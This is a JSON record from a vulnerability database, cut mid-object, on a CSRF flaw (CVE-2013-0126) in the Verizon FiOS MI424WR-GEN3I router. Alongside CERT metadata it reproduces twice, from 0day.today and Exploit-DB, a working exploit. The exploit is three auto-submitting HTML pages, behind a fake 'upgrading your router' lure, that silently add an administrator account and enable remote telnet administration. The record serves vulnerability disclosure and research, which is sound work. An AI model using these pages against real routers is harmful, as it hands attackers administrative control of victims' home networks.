"2013-03-18T00:00:00", "id": "VU:278204", "href": "https://www.kb.cert.org/vuls/id/278204", "type": "cert", "title": "Verizon Fios Actiontec model MI424WR-GEN3I router vulnerable to cross-site request forgery", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-12T03:52:06", "bulletinFamily": "exploit", "description": "Verizon Fios Router version MI424WR-GEN3I suffers from a cross site request forgery vulnerability.", "modified": "2013-03-20T00:00:00", "published": "2013-03-20T00:00:00", "id": "1337DAY-ID-20537", "href": "https://0day.today/exploit/description/20537", "type": "zdt", "title": "Verizon Fios Router MI424WR-GEN3I CSRF Vulnerability", "sourceData": "# Exploit Title: Verizon Fios Router CSRF Admin Shell\r\n# Date: Discovered and reported January 2013\r\n# Author: Jacob Holcomb/Gimppy - Security Analyst @ Independent Security Evaluators\r\n# Software: Verizon FIOS Router - Firmware 40.19.36 (http://verizon.com)\r\n# CVE: CVE-2013-0126\r\n# Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html\r\n \r\nUS CERT Disclosure: http://www.kb.cert.org/vuls/id/278204\r\n \r\nExploit Code:\r\n \r\nHTML FILE #1\r\n \r\n<html>\r\n<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>\r\n<!--Cisco Model: MI424WR-GEN3I -->\r\n<!--Firmware Version: 40.19.36 -->\r\n<h1>Please sit tight while we upgrade your router</h1>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCisco\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"user_id\" value=\"-1\"/>\r\n<input type=\"hidden\" name=\"fullname_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"fullname\" value=\"g42\"/>\r\n<input type=\"hidden\" name=\"username_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"username\" value=\"G42\"/>\r\n<input type=\"hidden\" name=\"user_level\" value=\"2\"/>\r\n<input type=\"hidden\" name=\"email_system_notify_level\" value=\"15\"/>\r\n<input type=\"hidden\" name=\"email_security_notify_level\" value=\"15\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS2.html\");};window.setTimeout(CSRF1,1000)\r\nfunction CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)\r\n</script>\r\n \r\n</body>\r\n</html>\r\n \r\nHTML FILE #2\r\n \r\n<html>\r\n<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCiscoC\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_confirm_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS3.html\");};window.setTimeout(CSRF1,0500)\r\nfunction CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)\r\n</script>\r\n \r\n</body>\r\n</html>\r\n \r\nHTML FILE #3\r\n \r\n <html>\r\n<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCiscoRemote\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"9078\"/>\r\n<input type=\"hidden\" name=\"active_page_str\" value=\"page_remote_admin\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"Remote Administration\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\"\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary\" value=\"1\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_ssl_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_icmp_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_traceroute_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary\" value=\"1\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)\r\n</script>\r\n \r\n</body>\r\n</html>\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20537"}], "exploitdb": [{"lastseen": "2016-02-03T00:10:11", "bulletinFamily": "exploit", "description": "Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability. CVE-2013-0126. Webapps exploit for hardware platform", "modified": "2013-03-19T00:00:00", "published": "2013-03-19T00:00:00", "id": "EDB-ID:24860", "href": "https://www.exploit-db.com/exploits/24860/", "type": "exploitdb", "title": "Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability", "sourceData": "# Exploit Title: Verizon Fios Router CSRF Admin Shell \r\n# Date: Discovered and reported January 2013\r\n# Author: Jacob Holcomb/Gimppy - Security Analyst @ Independent Security Evaluators\r\n# Software: Verizon FIOS Router - Firmware 40.19.36 (http://verizon.com)\r\n# CVE: CVE-2013-0126\r\n# Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html\r\n\r\nUS CERT Disclosure: http://www.kb.cert.org/vuls/id/278204\r\n\r\nExploit Code:\r\n\r\nHTML FILE #1\r\n\r\n<html>\r\n<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>\r\n<!--Cisco Model: MI424WR-GEN3I -->\r\n<!--Firmware Version: 40.19.36 -->\r\n<h1>Please sit tight while we upgrade your router</h1>\r\n\r\n<body>\r\n\r\n<form name=\"verizonCisco\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"user_id\" value=\"-1\"/>\r\n<input type=\"hidden\" name=\"fullname_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"fullname\" value=\"g42\"/>\r\n<input type=\"hidden\" name=\"username_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"username\" value=\"G42\"/>\r\n<input type=\"hidden\" name=\"user_level\" value=\"2\"/>\r\n<input type=\"hidden\" name=\"email_system_notify_level\" value=\"15\"/>\r\n<input type=\"hidden\" name=\"email_security_notify_level\" value=\"15\"/>\r\n</form>\r\n\r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS2.html\");};window.setTimeout(CSRF1,1000)\r\nfunction CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)\r\n</script>\r\n\r\n</body>\r\n</html>\r\n\r\nHTML FILE #2\r\n\r\n<html>\r\n<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>\r\n\r\n<body>\r\n\r\n<form name=\"verizonCiscoC\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_confirm_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n</form>\r\n\r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS3.html\");};window.setTimeout(CSRF1,0500)\r\nfunction CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)\r\n</script>\r\n\r\n</body>\r\n</html>\r\n\r\nHTML FILE #3\r\n\r\n <html>\r\n<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>\r\n\r\n<body>\r\n\r\n<form name=\"verizonCiscoRemote\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"9078\"/>\r\n<input type=\"hidden\" name=\"active_page_str\" value=\"page_remote_admin\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"Remote Administration\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\"\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary\" value=\"1\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_ssl_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_icmp_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_traceroute_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary\" value=\"1\"/>\r\n</form>\r\n\r\n<script>\r\nfunction CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)\r\n</script>\r\n\r\n</body>\r\n</html>\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24860/"}]}
